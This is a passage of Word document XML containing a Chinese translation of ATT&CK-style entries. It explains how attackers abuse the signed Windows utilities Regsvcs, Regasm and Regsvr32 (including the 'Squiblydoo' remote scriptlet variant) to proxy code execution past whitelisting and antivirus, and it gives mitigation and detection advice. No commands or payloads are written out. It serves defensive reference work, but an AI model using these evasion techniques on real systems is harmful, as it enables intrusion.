              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14C7B1A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF67A34" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regsvcs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regasm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（组件对象模型）程序集。两者都是微软数字签名的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAFB60" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regsvcs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regasm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过受信任的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序来代理执行代码。这两个实用程序都可以通过使用二进制文件中的属性，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[ComRegisterFunction]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[ComUnregisterFunction]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，来指定应在注册或注销之前分别运行的代码，从而绕过进程白名单。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A6D97" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即使进程在没有足够权限的情况下运行并且执行失败，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>也将执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有注册和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注销</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AF9EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="2381E854" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="443291D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6311233E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5F505F7E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49BA9A15" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B600FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在给定环境中可能不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Regsvcs</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Regasm</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6613DF0C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="296C5B76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CFD8CEB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果给定系统或网络不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Regsvcs.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Regasm.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，则阻止执行它们，防止攻击者滥用它们。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2360BABC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E87CF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DD756" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regsvcs.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regasm.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regsvcs.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regasm.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最近调用与已知恰当参数及已执行二进制文件的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regsvcs.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regasm.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用之前和之后使用的命令参数也可用于确定正在执行的二进制文件的来源和目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680AB10B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regsvr32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5EA0F72E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D36D2AE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1117</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3D4C55" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A61ABE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="345CB7E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6407DA54" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>已加载</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>动态链接库，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4FB850" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="395E88D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，防病毒，数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB46749" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Casey Smith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75EB4AC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60378AC8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD40A26" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上注册和注销对象链接及嵌入控件，包括动态链接库（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于执行任意二进制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96386F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会利用此功能代理执行代码，从而避免触发那些可能不会监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regsvr32.ex</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程执行及其加载模块的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>安全工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>因</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为正常操作中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有白名单或误报。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也是微软签名的二进制文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFD1FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>egsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可用于专门绕过进程白名单，方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本小程序在用户权限下执行动态链接库。由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有网络和代理感知功能，可以在调用期间将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为参数传递到外部</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器上的文件来加载脚本。此方法不对注册表进行任何更改，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象实际上未注册，仅执行。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>技术变种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常称为“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Squiblydoo</w:t>
